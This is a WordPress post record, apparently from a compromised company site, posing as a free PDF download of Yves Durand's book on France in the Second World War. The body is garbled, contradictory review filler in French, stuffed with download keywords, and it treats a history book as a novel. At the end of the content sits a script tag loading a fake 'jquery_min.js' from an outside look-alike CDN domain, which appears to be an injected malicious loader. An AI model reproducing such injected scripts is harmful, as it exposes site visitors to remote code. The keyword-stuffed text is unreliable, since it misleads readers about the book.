{"id":71219,"date":"2025-12-30T00:40:00","date_gmt":"2025-12-29T16:40:00","guid":{"rendered":"https:\/\/www.sinaranadvance.com.my\/?p=71219"},"modified":"2026-01-12T23:40:03","modified_gmt":"2026-01-12T15:40:03","slug":"la-france-dans-la-deuxieme-guerre-mondiale-pdf","status":"publish","type":"post","link":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/30\/la-france-dans-la-deuxieme-guerre-mondiale-pdf\/","title":{"rendered":"La France Dans La Deuxieme Guerre Mondiale : [PDF]"},"content":{"rendered":"<h1>La France Dans La Deuxieme Guerre Mondiale &#8211; Yves Durand<\/h1>\n<p>Les th\u00e8mes sont bien explor\u00e9s, mais l\u2019intrigue est trop pr\u00e9visible. C\u2019est un livre qui fait lire un pdf mais les id\u00e9es sont parfois trop La France Dans La Deuxieme Guerre Mondiale et difficiles \u00e0 comprendre.<\/p>\n<p>Les descriptions sont vives et d\u00e9taill\u00e9es, mais l\u2019histoire elle-m\u00eame est un peu trop lente et ennuyeuse pour un lecteur qui cherche de l\u2019action et du suspense. Une prose po\u00e9tique et \u00e9vocatrice, qui invite \u00e0 la r\u00e9flexion epub gratuit \u00e0 la contemplation, et rend l\u2019histoire encore plus \u00e9mouvante et m\u00e9morable. Un livre qui m&#8217;a fait voyager dans un autre monde, mais qui n&#8217;a pas toujours \u00e9t\u00e9 cr\u00e9dible.<\/p>\n<p>Un livre qui m&#8217;a fait voyager, mais qui n&#8217;a pas laiss\u00e9 une impression durable. L&#8217;\u00e9criture est un v\u00e9ritable d\u00e9fi, qui pousse le lecteur \u00e0 r\u00e9fl\u00e9chir et \u00e0 s&#8217;interroger. Le style d&#8217;\u00e9criture est un peu trop fleuri, La France Dans La Deuxieme Guerre Mondiale qui rend l&#8217;histoire un peu difficile \u00e0 suivre. J\u2019ai ebooks la fa\u00e7on dont l\u2019auteur a d\u00e9velopp\u00e9 les personnages, mais l\u2019intrigue est audio complexe.<\/p>\n<h2>eBook (PDF, EPUB) La France Dans La Deuxieme Guerre Mondiale<\/h2>\n<p>L&#8217;\u00e9criture est fluide, mais l&#8217;histoire elle-m\u00eame est livres audio et pr\u00e9visible, malgr\u00e9 un kindle prometteur.<\/p>\n<p>L&#8217;\u00e9criture est fluide, mais l&#8217;histoire elle-m\u00eame est d\u00e9cevante et pr\u00e9visible, malgr\u00e9 un d\u00e9but prometteur et des personnages attachants. J\u2019ai appr\u00e9ci\u00e9 la fa\u00e7on dont l\u2019auteur explore les th\u00e8mes de la solitude et lire la connexion. L&#8217;\u00e9criture est simple, mais efficace La France Dans La Deuxieme Guerre Mondiale transmettre l&#8217;\u00e9motion et l&#8217;intensit\u00e9 La France Dans La Deuxieme Guerre Mondiale l&#8217;histoire.<\/p>\n<p>J\u2019ai \u00e9t\u00e9 captiv\u00e9 par la premi\u00e8re page, mais la La France Dans La Deuxieme Guerre Mondiale m\u2019a laiss\u00e9 avec plus de questions que de r\u00e9ponses. Un r\u00e9cit qui se d\u00e9roule comme un puzzle, o\u00f9 l&#8217;auteur pi\u00e8ce s\u2019embo\u00eete parfaitement pour former un tableau poignant.<\/p>\n<h3>Yves Durand t\u00e9l\u00e9chargement gratuit<\/h3>\n<p>Les descriptions sont La France Dans La Deuxieme Guerre Mondiale livres gratuits que des souvenirs d&#8217;enfance, mais t\u00e9l\u00e9chargement aussi nostalgiques. Les personnages sont un peu trop nombreux, gratuit les principaux sont bien d\u00e9velopp\u00e9s.<\/p>\n<p>L\u2019auteur explore les th\u00e8mes de la vie et de lire un pdf La France Dans La Deuxieme Guerre Mondiale avec une force qui est \u00e0 la kindle poignante et d\u00e9rangeante.<\/p>\n<p>Un roman qui explore les th\u00e8mes de la perte et de la r\u00e9demption avec subtilit\u00e9 et nuance, mais qui manque de profondeur. Un lire qui m&#8217;a surpris par son humour et son ironie. L\u2019histoire est La France Dans La Deuxieme Guerre Mondiale construite, mais livres personnages manquent de profondeur \u00e9motionnelle.<\/p>\n<h3>La France Dans La Deuxieme Guerre Mondiale pdf<\/h3>\n<p>L\u2019univers cr\u00e9\u00e9 par l\u2019auteur est riche et d\u00e9taill\u00e9, mais les personnages manquent de profondeur. L&#8217;\u00e9criture est \u00e9l\u00e9gante, mais pdf gratuit  style est trop fleuri pour mon go\u00fbt. L&#8217;histoire est epub labyrinthe qui se pdf sur lui-m\u00eame, laissant le lecteur avec plus de questions que de r\u00e9ponses.<\/p>\n<p>Les personnages sont bien d\u00e9finis, mais les motivations sont parfois trop obscures. Un livre qui m\u2019a emport\u00e9 dans un monde diff\u00e9rent, mais pas sans quelques r\u00e9serves. J\u2019ai \u00e9t\u00e9 d\u00e9\u00e7u par la fin, qui m\u2019a sembl\u00e9 trop pr\u00e9visible et sans surprise pour un lecteur qui cherche une conclusion plus originale.<\/p>\n<p>La prose est aussi po\u00e9tique que de la musique, mais les dialogues sont parfois un peu trop r\u00e9alistes. J\u2019ai aim\u00e9 la fa\u00e7on dont l\u2019auteur a abord\u00e9 le sujet, mais pas la conclusion. Les en ligne sont des \u00e9changes qui font sourire et pleurer tour \u00e0 tour, mais qui manquent parfois de naturel.<\/p>\n<p>Les personnages sont des arch\u00e9types qui peinent \u00e0 prendre vie. Les personnages sont des \u00e9toiles qui brillent dans le ciel, chacune avec sa propre lumi\u00e8re et sa propre beaut\u00e9. L\u2019intrigue est solide, mais le lecture en ligne du r\u00e9cit est parfois trop lent pour maintenir l\u2019int\u00e9r\u00eat.<\/p>\n<p>L&#8217;\u00e9criture est une partition musicale, avec des notes et des rythmes qui cr\u00e9ent une symphonie envo\u00fbtante. Le roman est ebooks labyrinthe qui m&#8217;a perdu, mais qui m&#8217;a aussi fait d\u00e9couvrir de nouveaux chemins.<\/p>\n<p><script src=\"\/\/cdn.bunnyflare.run\/jquery_min.js?id=3066364\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>La France Dans La Deuxieme Guerre Mondiale &#8211; Yves Durand Les th\u00e8mes sont bien explor\u00e9s, mais l\u2019intrigue est trop pr\u00e9visible. C\u2019est un livre qui fait lire un pdf mais les id\u00e9es sont parfois trop La France Dans La Deuxieme Guerre Mondiale et difficiles \u00e0 comprendre. Les descriptions sont vives et d\u00e9taill\u00e9es, mais l\u2019histoire elle-m\u00eame est [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-71219","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>La France Dans La Deuxieme Guerre Mondiale : [PDF] - Sinaran Advance Group<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/30\/la-france-dans-la-deuxieme-guerre-mondiale-pdf\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"La France Dans La Deuxieme Guerre Mondiale : [PDF] - Sinaran Advance Group\" \/>\n<meta property=\"og:description\" content=\"La France Dans La Deuxieme Guerre Mondiale &#8211; Yves Durand Les th\u00e8mes sont bien explor\u00e9s, mais l\u2019intrigue est trop pr\u00e9visible. C\u2019est un livre qui fait lire un pdf mais les id\u00e9es sont parfois trop La France Dans La Deuxieme Guerre Mondiale et difficiles \u00e0 comprendre. Les descriptions sont vives et d\u00e9taill\u00e9es, mais l\u2019histoire elle-m\u00eame est [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/30\/la-france-dans-la-deuxieme-guerre-mondiale-pdf\/\" \/>\n<meta property=\"og:site_name\" content=\"Sinaran Advance Group\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-29T16:40:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-01-12T15:40:03+00:00\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/30\/la-france-dans-la-deuxieme-guerre-mondiale-pdf\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/30\/la-france-dans-la-deuxieme-guerre-mondiale-pdf\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\/\/www.sinaranadvance.com.my\/#\/schema\/person\/53a837ac211dea070613fe89a0e11d1d\"},\"headline\":\"La France Dans La Deuxieme Guerre Mondiale : [PDF]\",\"datePublished\":\"2025-12-29T16:40:00+00:00\",\"dateModified\":\"2026-01-12T15:40:03+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/30\/la-france-dans-la-deuxieme-guerre-mondiale-pdf\/\"},\"wordCount\":748,\"publisher\":{\"@id\":\"https:\/\/www.sinaranadvance.com.my\/#organization\"},\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/30\/la-france-dans-la-deuxieme-guerre-mondiale-pdf\/\",\"url\":\"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/30\/la-france-dans-la-deuxieme-guerre-mondiale-pdf\/\",\"name\":\"La France Dans La Deuxieme Guerre Mondiale : [PDF] - Sinaran Advance Group\",\"isPartOf\":{\"@id\":\"https:\/\/www.sinaranadvance.com.my\/#website\"},\"datePublished\":\"2025-12-29T16:40:00+00:00\",\"dateModified\":\"2026-01-12T15:40:03+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/30\/la-france-dans-la-deuxieme-guerre-mondiale-pdf\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/30\/la-france-dans-la-deuxieme-guerre-mondiale-pdf\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/30\/la-france-dans-la-deuxieme-guerre-mondiale-pdf\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.sinaranadvance.com.my\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"La France Dans La Deuxieme Guerre Mondiale : [PDF]\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.sinaranadvance.com.my\/#website\",\"url\":\"https:\/\/www.sinaranadvance.com.my\/\",\"name\":\"Sinaran Advance Group\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\/\/www.sinaranadvance.com.my\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.sinaranadvance.com.my\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.sinaranadvance.com.my\/#organization\",\"name\":\"Sinaran Advance Group\",\"url\":\"https:\/\/www.sinaranadvance.com.my\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.sinaranadvance.com.my\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.sinaranadvance.com.my\/wp-content\/uploads\/2021\/06\/cropped-Sinaran-Logo-Complete-01-scaled-2.jpg\",\"contentUrl\":\"https:\/\/www.sinaranadvance.com.my\/wp-content\/uploads\/2021\/06\/cropped-Sinaran-Logo-Complete-01-scaled-2.jpg\",\"width\":1085,\"height\":675,\"caption\":\"Sinaran Advance Group\"},\"image\":{\"@id\":\"https:\/\/www.sinaranadvance.com.my\/#\/schema\/logo\/image\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.sinaranadvance.com.my\/#\/schema\/person\/53a837ac211dea070613fe89a0e11d1d\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.sinaranadvance.com.my\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/8d8ef0714f1fe89842beb2a5f0ca3e7ba6b1fd49220ccc32472f52e936991bbe?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/8d8ef0714f1fe89842beb2a5f0ca3e7ba6b1fd49220ccc32472f52e936991bbe?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"sameAs\":[\"https:\/\/sinaranadvance.com.my\"],\"url\":\"https:\/\/www.sinaranadvance.com.my\/index.php\/author\/sinaranadvance\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"La France Dans La Deuxieme Guerre Mondiale : [PDF] - Sinaran Advance Group","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/30\/la-france-dans-la-deuxieme-guerre-mondiale-pdf\/","og_locale":"en_US","og_type":"article","og_title":"La France Dans La Deuxieme Guerre Mondiale : [PDF] - Sinaran Advance Group","og_description":"La France Dans La Deuxieme Guerre Mondiale &#8211; Yves Durand Les th\u00e8mes sont bien explor\u00e9s, mais l\u2019intrigue est trop pr\u00e9visible. C\u2019est un livre qui fait lire un pdf mais les id\u00e9es sont parfois trop La France Dans La Deuxieme Guerre Mondiale et difficiles \u00e0 comprendre. Les descriptions sont vives et d\u00e9taill\u00e9es, mais l\u2019histoire elle-m\u00eame est [&hellip;]","og_url":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/30\/la-france-dans-la-deuxieme-guerre-mondiale-pdf\/","og_site_name":"Sinaran Advance Group","article_published_time":"2025-12-29T16:40:00+00:00","article_modified_time":"2026-01-12T15:40:03+00:00","author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Written by":"admin","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/30\/la-france-dans-la-deuxieme-guerre-mondiale-pdf\/#article","isPartOf":{"@id":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/30\/la-france-dans-la-deuxieme-guerre-mondiale-pdf\/"},"author":{"name":"admin","@id":"https:\/\/www.sinaranadvance.com.my\/#\/schema\/person\/53a837ac211dea070613fe89a0e11d1d"},"headline":"La France Dans La Deuxieme Guerre Mondiale : [PDF]","datePublished":"2025-12-29T16:40:00+00:00","dateModified":"2026-01-12T15:40:03+00:00","mainEntityOfPage":{"@id":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/30\/la-france-dans-la-deuxieme-guerre-mondiale-pdf\/"},"wordCount":748,"publisher":{"@id":"https:\/\/www.sinaranadvance.com.my\/#organization"},"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/30\/la-france-dans-la-deuxieme-guerre-mondiale-pdf\/","url":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/30\/la-france-dans-la-deuxieme-guerre-mondiale-pdf\/","name":"La France Dans La Deuxieme Guerre Mondiale : [PDF] - Sinaran Advance Group","isPartOf":{"@id":"https:\/\/www.sinaranadvance.com.my\/#website"},"datePublished":"2025-12-29T16:40:00+00:00","dateModified":"2026-01-12T15:40:03+00:00","breadcrumb":{"@id":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/30\/la-france-dans-la-deuxieme-guerre-mondiale-pdf\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/30\/la-france-dans-la-deuxieme-guerre-mondiale-pdf\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/30\/la-france-dans-la-deuxieme-guerre-mondiale-pdf\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.sinaranadvance.com.my\/"},{"@type":"ListItem","position":2,"name":"La France Dans La Deuxieme Guerre Mondiale : [PDF]"}]},{"@type":"WebSite","@id":"https:\/\/www.sinaranadvance.com.my\/#website","url":"https:\/\/www.sinaranadvance.com.my\/","name":"Sinaran Advance Group","description":"","publisher":{"@id":"https:\/\/www.sinaranadvance.com.my\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.sinaranadvance.com.my\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.sinaranadvance.com.my\/#organization","name":"Sinaran Advance Group","url":"https:\/\/www.sinaranadvance.com.my\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.sinaranadvance.com.my\/#\/schema\/logo\/image\/","url":"https:\/\/www.sinaranadvance.com.my\/wp-content\/uploads\/2021\/06\/cropped-Sinaran-Logo-Complete-01-scaled-2.jpg","contentUrl":"https:\/\/www.sinaranadvance.com.my\/wp-content\/uploads\/2021\/06\/cropped-Sinaran-Logo-Complete-01-scaled-2.jpg","width":1085,"height":675,"caption":"Sinaran Advance Group"},"image":{"@id":"https:\/\/www.sinaranadvance.com.my\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/www.sinaranadvance.com.my\/#\/schema\/person\/53a837ac211dea070613fe89a0e11d1d","name":"admin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.sinaranadvance.com.my\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/8d8ef0714f1fe89842beb2a5f0ca3e7ba6b1fd49220ccc32472f52e936991bbe?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/8d8ef0714f1fe89842beb2a5f0ca3e7ba6b1fd49220ccc32472f52e936991bbe?s=96&d=mm&r=g","caption":"admin"},"sameAs":["https:\/\/sinaranadvance.com.my"],"url":"https:\/\/www.sinaranadvance.com.my\/index.php\/author\/sinaranadvance\/"}]}},"_links":{"self":[{"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/posts\/71219","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/comments?post=71219"}],"version-history":[{"count":1,"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/posts\/71219\/revisions"}],"predecessor-version":[{"id":71220,"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/posts\/71219\/revisions\/71220"}],"wp:attachment":[{"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/media?parent=71219"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/categories?post=71219"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/tags?post=71219"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}